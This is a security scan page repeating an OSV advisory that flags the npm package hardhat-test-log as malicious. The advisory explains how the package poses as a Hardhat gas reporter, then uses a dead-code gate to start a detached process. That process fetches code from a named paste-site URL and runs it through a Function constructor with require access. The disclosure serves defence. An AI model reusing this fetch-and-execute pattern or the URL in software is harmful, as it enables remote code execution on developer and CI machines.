OSV Malicious Advisory
scanned 4h ago · by OpenSSF/OSVOpenSSF/OSV advisory MAL-2026-6369 confirms this npm version as malicious. Package impersonates the well-known eth-gas-reporter / hardhat-gas-reporter packages: README is titled 'eth-test-log', copies badges and contributor metadata, and package.json sets author to 'cgewecke' (the real maintainer of those projects). The advertised Mocha reporter entrypoint is a decoy. index.js exports `log` as the reporter, but the function contains `var opt = 1; if (!opt) {...legitimate reporter code... }...
Advisory
MAL-2026-6369
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in hardhat-test-log (npm)
Details
Package impersonates the well-known eth-gas-reporter / hardhat-gas-reporter packages: README is titled 'eth-test-log', copies badges and contributor metadata, and package.json sets author to 'cgewecke' (the real maintainer of those projects). The advertised Mocha reporter entrypoint is a decoy. index.js exports `log` as the reporter, but the function contains `var opt = 1; if (!opt) {...legitimate reporter code... } else { gestest(); }` — the dead-code gate guarantees the else branch always runs, calling utils.connectNet. utils.connectNet (lib/utils.js) spawns `node lib/syncResolve.js` as a detached, unref'd child with stdio ignored, so the dropper persists beyond Mocha teardown and produces no CI output. lib/syncResolve.js then performs `axios.get('https://www.jsonkeeper.com/b/KBZVB', { headers: { 'x-secret-key':... } })`, extracts the `Cookie` field from the response, and executes it in-process via `new Function.constructor('require', result)(require)` — giving attacker-controlled code full Node `require` access. The fetch destination is a public paste-style host with mutable, opaque content and no integrity check, so the operator can rotate the payload at will. Installing/using this package as a Hardhat/Mocha gas reporter triggers remote code execution on the developer's or CI machine.
Decision reason
OpenSSF Malicious Packages via OSV confirms hardhat-test-log@1.1.1 as malicious (MAL-2026-6369): Malicious code in hardhat-test-log (npm)
References
Source & flagged code
0 flaggedNo flagged code excerpts are attached to this scan.
Findings
1 High
HighOsv Malicious Advisory